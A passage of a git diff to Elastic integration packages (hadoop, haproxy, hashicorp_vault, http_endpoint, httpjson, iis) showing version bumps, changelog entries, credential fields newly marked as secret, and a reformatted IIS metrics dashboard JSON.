"8.3.0", - "id": "hadoop-c4e16fe0-cf73-11ec-bc3e-6faca2b11df2", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-ee57a119-2827-4586-82f1-c796c86d76d9", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/hadoop/manifest.yml b/packages/hadoop/manifest.yml index 4c2a9822f20..29f4d217e62 100644 --- a/packages/hadoop/manifest.yml +++ b/packages/hadoop/manifest.yml @@ -1,7 +1,7 @@ format_version: "3.0.0" name: hadoop title: Hadoop -version: "1.5.0" +version: "1.5.2" description: Collect metrics from Apache Hadoop with Elastic Agent. type: integration categories: diff --git a/packages/haproxy/_dev/build/docs/README.md b/packages/haproxy/_dev/build/docs/README.md index 1165e5eb170..f441bc0bca2 100644 --- a/packages/haproxy/_dev/build/docs/README.md +++ b/packages/haproxy/_dev/build/docs/README.md @@ -16,7 +16,7 @@ The `info` and `stat` datasets were tested with tested with HAProxy versions fro ## Troubleshooting -If `source.address` is shown conflicted under ``metrics-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the `stat` data stream indices. +If `source.address` is shown conflicted under ``metrics-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/tsds-reindex.html) the `stat` data stream indices. ## Logs diff --git a/packages/haproxy/changelog.yml b/packages/haproxy/changelog.yml index 1dcb8c11f05..c8a30ee9407 100644 --- a/packages/haproxy/changelog.yml +++ b/packages/haproxy/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.11.1" + changes: + - description: Update the link to the correct reindexing procedure. + type: bugfix + link: https://github.com/elastic/integrations/pull/9021 - version: "1.11.0" changes: - description: Migrate metrics dashboards visualizations to lens. diff --git a/packages/haproxy/docs/README.md b/packages/haproxy/docs/README.md index a32f765d63b..46bb15e4404 100644 --- a/packages/haproxy/docs/README.md +++ b/packages/haproxy/docs/README.md @@ -16,7 +16,7 @@ The `info` and `stat` datasets were tested with tested with HAProxy versions fro ## Troubleshooting -If `source.address` is shown conflicted under ``metrics-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the `stat` data stream indices. +If `source.address` is shown conflicted under ``metrics-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/tsds-reindex.html) the `stat` data stream indices. ## Logs diff --git a/packages/haproxy/manifest.yml b/packages/haproxy/manifest.yml index 8867f1359de..63e6c676cb7 100644 --- a/packages/haproxy/manifest.yml +++ b/packages/haproxy/manifest.yml @@ -1,6 +1,6 @@ name: haproxy title: HAProxy -version: "1.11.0" +version: "1.11.1" description: Collect logs and metrics from HAProxy servers with Elastic Agent. type: integration icons: diff --git a/packages/hashicorp_vault/changelog.yml b/packages/hashicorp_vault/changelog.yml index c2ceea3b536..a1e774c44a2 100644 --- a/packages/hashicorp_vault/changelog.yml +++ b/packages/hashicorp_vault/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.24.0" + changes: + - description: Update package-spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 +- version: "1.23.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9126 - version: "1.22.2" changes: - description: Changed owners diff --git a/packages/hashicorp_vault/data_stream/metrics/manifest.yml b/packages/hashicorp_vault/data_stream/metrics/manifest.yml index c064b7a9923..73d44fae7fe 100644 --- a/packages/hashicorp_vault/data_stream/metrics/manifest.yml +++ b/packages/hashicorp_vault/data_stream/metrics/manifest.yml @@ -20,12 +20,13 @@ streams: - http://localhost:8200 description: Vault addresses to monitor. `/v1/sys/metrics?format=prometheus` is automatically appended. - name: vault_token - type: text + type: password title: Vault Token multi: false required: true show_user: true description: A Vault token with read access to the /sys/metrics API. + secret: true - name: processors type: yaml title: Processors diff --git a/packages/hashicorp_vault/manifest.yml b/packages/hashicorp_vault/manifest.yml index dece2141689..d9d88ae6cb4 100644 --- a/packages/hashicorp_vault/manifest.yml +++ b/packages/hashicorp_vault/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: hashicorp_vault title: Hashicorp Vault -version: "1.22.2" +version: "1.24.0" description: Collect logs and metrics from Hashicorp Vault with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - iam conditions: kibana: - version: "^8.9.0" + version: "^8.12.0" screenshots: - src: /img/hashicorp_vault-audit-dashboard.png title: Audit Log Dashboard diff --git a/packages/http_endpoint/changelog.yml b/packages/http_endpoint/changelog.yml index 8ca059ece4c..569e32f48a6 100644 --- a/packages/http_endpoint/changelog.yml +++ b/packages/http_endpoint/changelog.yml @@ -1,3 +1,13 @@ +- version: "1.16.0" + changes: + - description: Allow user selection of HTTP method. + type: enhancement + link: https://github.com/elastic/integrations/pull/9311 +- version: "1.15.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 - version: "1.14.1" changes: - description: Changed owners diff --git a/packages/http_endpoint/data_stream/generic/agent/stream/http.yml.hbs b/packages/http_endpoint/data_stream/generic/agent/stream/http.yml.hbs index 49b609a41fb..0e41a572137 100644 --- a/packages/http_endpoint/data_stream/generic/agent/stream/http.yml.hbs +++ b/packages/http_endpoint/data_stream/generic/agent/stream/http.yml.hbs @@ -1,5 +1,6 @@ data_stream: dataset: {{data_stream.dataset}} +method: {{method}} listen_address: {{listen_address}} listen_port: {{listen_port}} {{#if prefix}} diff --git a/packages/http_endpoint/data_stream/generic/manifest.yml b/packages/http_endpoint/data_stream/generic/manifest.yml index 5575d4952e1..1fbca609a99 100644 --- a/packages/http_endpoint/data_stream/generic/manifest.yml +++ b/packages/http_endpoint/data_stream/generic/manifest.yml @@ -6,6 +6,20 @@ streams: title: Custom HTTP Endpoint Logs template_path: http.yml.hbs vars: + - name: method + title: HTTP Method + description: This options specifies which HTTP method to accept. + type: select + required: true + show_user: false + options: + - value: POST + text: POST + - value: PUT + text: PUT + - value: PATCH + text: PATCH + default: POST - name: listen_address type: text title: Listen Address @@ -73,18 +87,21 @@ streams: description: If basic_auth is enabled, this is the password used for authentication against the HTTP listener. Requires username to also be set. required: false show_user: false + secret: true - name: secret_header type: text title: Secret Header description: The header to check for a specific value specified by secret.value. Certain webhooks provide the possibility to include a special header and secret to identify the source. required: false show_user: false + secret: false - name: secret_value type: password title: Secret Value description: The secret stored in the header name specified by secret.header. Certain webhooks provide the possibility to include a special header and secret to identify the source. required: false show_user: false + secret: true - name: hmac_header type: text title: HMAC Header @@ -97,6 +114,7 @@ streams: description: The secret key used to calculate the HMAC signature. Typically, the webhook sender provides this value. required: false show_user: false + secret: true - name: hmac_type type: text title: HMAC Type diff --git a/packages/http_endpoint/manifest.yml b/packages/http_endpoint/manifest.yml index f7a23904acb..4a6f9e94894 100644 --- a/packages/http_endpoint/manifest.yml +++ b/packages/http_endpoint/manifest.yml @@ -1,12 +1,12 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: http_endpoint title: Custom HTTP Endpoint Logs description: Collect JSON data from listening HTTP port with Elastic Agent. type: integration -version: "1.14.1" +version: "1.16.0" conditions: kibana: - version: "^7.16.0 || ^8.0.0" + version: "^8.12.0" categories: - custom - observability diff --git a/packages/httpjson/_dev/build/docs/README.md b/packages/httpjson/_dev/build/docs/README.md index 3fc5d9e079d..4bf8bc94add 100644 --- a/packages/httpjson/_dev/build/docs/README.md +++ b/packages/httpjson/_dev/build/docs/README.md @@ -4,6 +4,8 @@ The custom API input integration is used to ingest data from custom RESTful API' The input itself supports sending both GET and POST requests, transform requests and responses during runtime, paginate and keep a running state on information from the last collected events. +If you are starting development of a new custom HTTP API input, we recommend that you use the [Common Expression Language input](../cel/overview) which provides greater flexibility and an improved developer experience. + ## Configuration The extensive documentation for the input are currently available {{ url "filebeat-input-httpjson" "here" }}. diff --git a/packages/httpjson/changelog.yml b/packages/httpjson/changelog.yml index 4d9e9fb51d1..fb16a20021b 100644 --- a/packages/httpjson/changelog.yml +++ b/packages/httpjson/changelog.yml @@ -1,3 +1,13 @@ +- version: "1.20.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 +- version: "1.19.0" + changes: + - description: Advise new projects to use CEL. + type: enhancement + link: https://github.com/elastic/integrations/pull/9018 - version: "1.18.1" changes: - description: Changed owners diff --git a/packages/httpjson/data_stream/generic/manifest.yml b/packages/httpjson/data_stream/generic/manifest.yml index 89b199f86c9..f4e680bf88a 100644 --- a/packages/httpjson/data_stream/generic/manifest.yml +++ b/packages/httpjson/data_stream/generic/manifest.yml @@ -54,6 +54,7 @@ streams: show_user: true required: false description: The password to be used with Basic Auth headers + secret: true - name: oauth_id type: text title: Oauth2 Client ID @@ -66,12 +67,14 @@ streams: description: Client secret used for Oauth2 authentication show_user: true required: false + secret: true - name: oauth_token_url type: text title: Oauth2 Token URL description: The URL endpoint that will be used to generate the tokens during the oauth2 flow. It is required if no oauth_custom variable is set or provider is not specified in oauth_custom variable. show_user: true required: false + secret: false - name: request_body type: yaml title: Request Body @@ -229,12 +232,13 @@ streams: multi: false required: false - name: oauth_google_credentials_json - type: text + type: password title: Oauth2 Google Credentials JSON description: Your Google credentials information as raw JSON. show_user: false multi: false required: false + secret: true - name: oauth_google_jwt_file type: text title: Oauth2 Google JWT File @@ -243,12 +247,13 @@ streams: multi: false required: false - name: oauth_google_jwt_json - type: text + type: password title: Oauth2 Google JWT JSON description: Your Google JWT information as raw JSON. multi: false required: false show_user: false + secret: true - name: oauth_google_delegated_account type: text title: Oauth2 Google Delegated account diff --git a/packages/httpjson/docs/README.md b/packages/httpjson/docs/README.md index 98ad2aec473..e99bde9efce 100644 --- a/packages/httpjson/docs/README.md +++ b/packages/httpjson/docs/README.md @@ -4,6 +4,8 @@ The custom API input integration is used to ingest data from custom RESTful API' The input itself supports sending both GET and POST requests, transform requests and responses during runtime, paginate and keep a running state on information from the last collected events. +If you are starting development of a new custom HTTP API input, we recommend that you use the [Common Expression Language input](../cel/overview) which provides greater flexibility and an improved developer experience. + ## Configuration The extensive documentation for the input are currently available [here](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html). diff --git a/packages/httpjson/manifest.yml b/packages/httpjson/manifest.yml index 38d38eb70a9..a58c6214b82 100644 --- a/packages/httpjson/manifest.yml +++ b/packages/httpjson/manifest.yml @@ -1,12 +1,12 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: httpjson title: Custom API description: Collect custom events from an API endpoint with Elastic agent type: integration -version: "1.18.1" +version: "1.20.0" conditions: kibana: - version: "^8.7.1" + version: "^8.12.0" categories: - custom policy_templates: diff --git a/packages/iis/changelog.yml b/packages/iis/changelog.yml index 4512097ec52..5c11dd5dcda 100644 --- a/packages/iis/changelog.yml +++ b/packages/iis/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.17.4" + changes: + - description: Inline "by reference" visualizations + type: enhancement + link: https://github.com/elastic/integrations/pull/8423 - version: "1.17.3" changes: - description: Update documentation for custom log format processing. diff --git a/packages/iis/kibana/dashboard/iis-2c171500-858b-11ea-91bc-ab084c7ec0e7.json b/packages/iis/kibana/dashboard/iis-2c171500-858b-11ea-91bc-ab084c7ec0e7.json index 210f9bec7ba..e60b5d7d96d 100644 --- a/packages/iis/kibana/dashboard/iis-2c171500-858b-11ea-91bc-ab084c7ec0e7.json +++ b/packages/iis/kibana/dashboard/iis-2c171500-858b-11ea-91bc-ab084c7ec0e7.json @@ -1,1748 +1,1768 @@ { - "attributes": { - "description": "This dashboard shows process and cache metrics for the IIS server.", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { + "id": "iis-2c171500-858b-11ea-91bc-ab084c7ec0e7", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.7.0" + }, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.7.0", + "updated_at": "2023-11-07T17:17:42.355Z", + "created_at": "2023-11-07T17:17:42.355Z", + "version": "WzEwNCwxXQ==", + "attributes": { + "description": "This dashboard shows process and cache metrics for the IIS server.", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "useMargins": true + }, + "panelsJSON": [ + { + "version": "8.7.0", + "type": "visualization", + "gridData": { + "h": 5, + "i": "814bba79-ccef-4523-a1dd-ebf561e5c6a1", + "w": 10, + "x": 0, + "y": 0 + }, + "panelIndex": "814bba79-ccef-4523-a1dd-ebf561e5c6a1", + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { "filter": [], "query": { - "language": "kuery", - "query": "" + "language": "kuery", + "query": "" } - } + } + }, + "description": "", + "params": { + "fontSize": 10, + "markdown": "### IIS\n\n[Webserver](#/dashboard/iis-ebc23240-8572-11ea-91bc-ab084c7ec0e7)| [**Webserver processes**](#/dashboard/iis-2c171500-858b-11ea-91bc-ab084c7ec0e7) | [Websites](#/dashboard/iis-4b975820-85a1-11ea-91bc-ab084c7ec0e7) | [Application Pools](#/dashboard/iis-b4108810-861c-11ea-91bc-ab084c7ec0e7) ", + "openLinksInNewTab": false + }, + "type": "markdown", + "uiState": {} + }, + "type": "visualization" }, - "optionsJSON": { - "hidePanelTitles": false, - "useMargins": true + "title": "Navigation Webserver Process Overview" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 11, + "i": "1f700551-5464-467f-99ec-3b329e355195", + "w": 8, + "x": 10, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "panelIndex": "1f700551-5464-467f-99ec-3b329e355195", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-182147bc-f15e-4d7e-80f0-f63350a5b838", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "182147bc-f15e-4d7e-80f0-f63350a5b838": { + "columnOrder": [ + "2e94cbb7-cf0c-468d-9073-1ea35cb3aeee", + "e563be1e-dc83-40f2-9047-b1a8edadf9e5", + "e563be1e-dc83-40f2-9047-b1a8edadf9e5X0", + "e563be1e-dc83-40f2-9047-b1a8edadf9e5X1" + ], + "columns": { + "2e94cbb7-cf0c-468d-9073-1ea35cb3aeee": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.cache.output_cache_current_memory_usage: *" + }, + "isBucketed": false, + "label": "Output Cache Current Memory Usage", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.cache.output_cache_current_memory_usage" + }, + "e563be1e-dc83-40f2-9047-b1a8edadf9e5": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(iis.webserver.cache.output_cache_current_memory_usage))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(iis.webserver.cache.output_cache_current_memory_usage))", + "isFormulaBroken": false + }, + "references": [ + "e563be1e-dc83-40f2-9047-b1a8edadf9e5X1" + ], + "scale": "ratio" }, - "description": "", - "params": { - "fontSize": 10, - "markdown": "### IIS\n\n[Webserver](#/dashboard/iis-ebc23240-8572-11ea-91bc-ab084c7ec0e7)| [**Webserver processes**](#/dashboard/iis-2c171500-858b-11ea-91bc-ab084c7ec0e7) | [Websites](#/dashboard/iis-4b975820-85a1-11ea-91bc-ab084c7ec0e7) | [Application Pools](#/dashboard/iis-b4108810-861c-11ea-91bc-ab084c7ec0e7) ", - "openLinksInNewTab": false + "e563be1e-dc83-40f2-9047-b1a8edadf9e5X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.cache.output_cache_current_memory_usage: *" + }, + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.cache.output_cache_current_memory_usage))", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.cache.output_cache_current_memory_usage" }, - "type": "markdown", - "uiState": {} + "e563be1e-dc83-40f2-9047-b1a8edadf9e5X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.cache.output_cache_current_memory_usage))", + "operationType": "overall_max", + "references": [ + "e563be1e-dc83-40f2-9047-b1a8edadf9e5X0" + ], + "scale": "ratio" + } + }, + "incompleteColumns": {} } - }, - "gridData": { - "h": 5, - "i": "814bba79-ccef-4523-a1dd-ebf561e5c6a1", - "w": 10, - "x": 0, - "y": 0 - }, - "panelIndex": "814bba79-ccef-4523-a1dd-ebf561e5c6a1", - "title": "Navigation Webserver Process Overview", - "type": "visualization", - "version": "8.5.0" + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#D3B515", + "layerId": "182147bc-f15e-4d7e-80f0-f63350a5b838", + "layerType": "data", + "maxAccessor": "e563be1e-dc83-40f2-9047-b1a8edadf9e5", + "metricAccessor": "2e94cbb7-cf0c-468d-9073-1ea35cb3aeee", + "progressDirection": "horizontal" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-182147bc-f15e-4d7e-80f0-f63350a5b838", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "182147bc-f15e-4d7e-80f0-f63350a5b838": { - "columnOrder": [ - "2e94cbb7-cf0c-468d-9073-1ea35cb3aeee", - "e563be1e-dc83-40f2-9047-b1a8edadf9e5", - "e563be1e-dc83-40f2-9047-b1a8edadf9e5X0", - "e563be1e-dc83-40f2-9047-b1a8edadf9e5X1" - ], - "columns": { - "2e94cbb7-cf0c-468d-9073-1ea35cb3aeee": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.cache.output_cache_current_memory_usage: *" - }, - "isBucketed": false, - "label": "Output Cache Current Memory Usage", - "operationType": "last_value", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.cache.output_cache_current_memory_usage" - }, - "e563be1e-dc83-40f2-9047-b1a8edadf9e5": { - "dataType": "number", - "isBucketed": false, - "label": "overall_max(last_value(iis.webserver.cache.output_cache_current_memory_usage))", - "operationType": "formula", - "params": { - "formula": "overall_max(last_value(iis.webserver.cache.output_cache_current_memory_usage))", - "isFormulaBroken": false - }, - "references": [ - "e563be1e-dc83-40f2-9047-b1a8edadf9e5X1" - ], - "scale": "ratio" - }, - "e563be1e-dc83-40f2-9047-b1a8edadf9e5X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.cache.output_cache_current_memory_usage: *" - }, - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.cache.output_cache_current_memory_usage))", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.cache.output_cache_current_memory_usage" - }, - "e563be1e-dc83-40f2-9047-b1a8edadf9e5X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.cache.output_cache_current_memory_usage))", - "operationType": "overall_max", - "references": [ - "e563be1e-dc83-40f2-9047-b1a8edadf9e5X0" - ], - "scale": "ratio" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "color": "#D3B515", - "layerId": "182147bc-f15e-4d7e-80f0-f63350a5b838", - "layerType": "data", - "maxAccessor": "e563be1e-dc83-40f2-9047-b1a8edadf9e5", - "metricAccessor": "2e94cbb7-cf0c-468d-9073-1ea35cb3aeee", - "progressDirection": "horizontal" - } + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Output Cache Current Memory Usage" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 11, + "i": "d2f639d2-4288-4110-871d-c123e43a8a5f", + "w": 10, + "x": 18, + "y": 0 + }, + "panelIndex": "d2f639d2-4288-4110-871d-c123e43a8a5f", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-0c02afa5-d4e9-4ac4-ba6b-3a03417fbb3b", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "0c02afa5-d4e9-4ac4-ba6b-3a03417fbb3b": { + "columnOrder": [ + "b1337d24-b9ec-486a-b473-0bd61f9a9676", + "7b6ff221-0009-4ce4-aad1-2d7c0c75ab3b", + "7b6ff221-0009-4ce4-aad1-2d7c0c75ab3bX0", + "7b6ff221-0009-4ce4-aad1-2d7c0c75ab3bX1" + ], + "columns": { + "7b6ff221-0009-4ce4-aad1-2d7c0c75ab3b": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(iis.webserver.process.worker_process_count))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(iis.webserver.process.worker_process_count))", + "isFormulaBroken": false + }, + "references": [ + "7b6ff221-0009-4ce4-aad1-2d7c0c75ab3bX1" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 11, - "i": "1f700551-5464-467f-99ec-3b329e355195", - "w": 8, - "x": 10, - "y": 0 - }, - "panelIndex": "1f700551-5464-467f-99ec-3b329e355195", - "title": "Output Cache Current Memory Usage", - "type": "lens", - "version": "8.5.0" + "7b6ff221-0009-4ce4-aad1-2d7c0c75ab3bX0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.process.worker_process_count: *" + }, + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.process.worker_process_count))", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.process.worker_process_count" + }, + "7b6ff221-0009-4ce4-aad1-2d7c0c75ab3bX1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.process.worker_process_count))", + "operationType": "overall_max", + "references": [ + "7b6ff221-0009-4ce4-aad1-2d7c0c75ab3bX0" + ], + "scale": "ratio" + }, + "b1337d24-b9ec-486a-b473-0bd61f9a9676": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.process.worker_process_count: *" + }, + "isBucketed": false, + "label": "Worker Processes", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.process.worker_process_count" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#D33115", + "layerId": "0c02afa5-d4e9-4ac4-ba6b-3a03417fbb3b", + "layerType": "data", + "maxAccessor": "7b6ff221-0009-4ce4-aad1-2d7c0c75ab3b", + "metricAccessor": "b1337d24-b9ec-486a-b473-0bd61f9a9676", + "progressDirection": "horizontal" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-0c02afa5-d4e9-4ac4-ba6b-3a03417fbb3b", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "0c02afa5-d4e9-4ac4-ba6b-3a03417fbb3b": { - "columnOrder": [ - "b1337d24-b9ec-486a-b473-0bd61f9a9676", - "7b6ff221-0009-4ce4-aad1-2d7c0c75ab3b", - "7b6ff221-0009-4ce4-aad1-2d7c0c75ab3bX0", - "7b6ff221-0009-4ce4-aad1-2d7c0c75ab3bX1" - ], - "columns": { - "7b6ff221-0009-4ce4-aad1-2d7c0c75ab3b": { - "dataType": "number", - "isBucketed": false, - "label": "overall_max(last_value(iis.webserver.process.worker_process_count))", - "operationType": "formula", - "params": { - "formula": "overall_max(last_value(iis.webserver.process.worker_process_count))", - "isFormulaBroken": false - }, - "references": [ - "7b6ff221-0009-4ce4-aad1-2d7c0c75ab3bX1" - ], - "scale": "ratio" - }, - "7b6ff221-0009-4ce4-aad1-2d7c0c75ab3bX0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.process.worker_process_count: *" - }, - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.process.worker_process_count))", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.process.worker_process_count" - }, - "7b6ff221-0009-4ce4-aad1-2d7c0c75ab3bX1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.process.worker_process_count))", - "operationType": "overall_max", - "references": [ - "7b6ff221-0009-4ce4-aad1-2d7c0c75ab3bX0" - ], - "scale": "ratio" - }, - "b1337d24-b9ec-486a-b473-0bd61f9a9676": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.process.worker_process_count: *" - }, - "isBucketed": false, - "label": "Worker Processes", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.process.worker_process_count" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "color": "#D33115", - "layerId": "0c02afa5-d4e9-4ac4-ba6b-3a03417fbb3b", - "layerType": "data", - "maxAccessor": "7b6ff221-0009-4ce4-aad1-2d7c0c75ab3b", - "metricAccessor": "b1337d24-b9ec-486a-b473-0bd61f9a9676", - "progressDirection": "horizontal" - } + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Worker Process Count" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 11, + "i": "8392c4c6-1aed-4e8d-9015-15526bc1ceb6", + "w": 10, + "x": 28, + "y": 0 + }, + "panelIndex": "8392c4c6-1aed-4e8d-9015-15526bc1ceb6", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-36bd76ba-75e7-4da3-9b47-1761f2a90360", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "36bd76ba-75e7-4da3-9b47-1761f2a90360": { + "columnOrder": [ + "5b28c920-82fe-4b46-9cb4-3ded30e1003f", + "2498791c-ea82-4bb4-b12b-0034cb09e964", + "2498791c-ea82-4bb4-b12b-0034cb09e964X0", + "2498791c-ea82-4bb4-b12b-0034cb09e964X1" + ], + "columns": { + "2498791c-ea82-4bb4-b12b-0034cb09e964": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(iis.webserver.process.thread_count))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(iis.webserver.process.thread_count))", + "isFormulaBroken": false + }, + "references": [ + "2498791c-ea82-4bb4-b12b-0034cb09e964X1" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 11, - "i": "d2f639d2-4288-4110-871d-c123e43a8a5f", - "w": 10, - "x": 18, - "y": 0 - }, - "panelIndex": "d2f639d2-4288-4110-871d-c123e43a8a5f", - "title": "Worker Process Count", - "type": "lens", - "version": "8.5.0" + "2498791c-ea82-4bb4-b12b-0034cb09e964X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.process.thread_count: *" + }, + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.process.thread_count))", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.process.thread_count" + }, + "2498791c-ea82-4bb4-b12b-0034cb09e964X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.process.thread_count))", + "operationType": "overall_max", + "references": [ + "2498791c-ea82-4bb4-b12b-0034cb09e964X0" + ], + "scale": "ratio" + }, + "5b28c920-82fe-4b46-9cb4-3ded30e1003f": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.process.thread_count: *" + }, + "isBucketed": false, + "label": "Thread Count", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.process.thread_count" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#16A5A5", + "layerId": "36bd76ba-75e7-4da3-9b47-1761f2a90360", + "layerType": "data", + "maxAccessor": "2498791c-ea82-4bb4-b12b-0034cb09e964", + "metricAccessor": 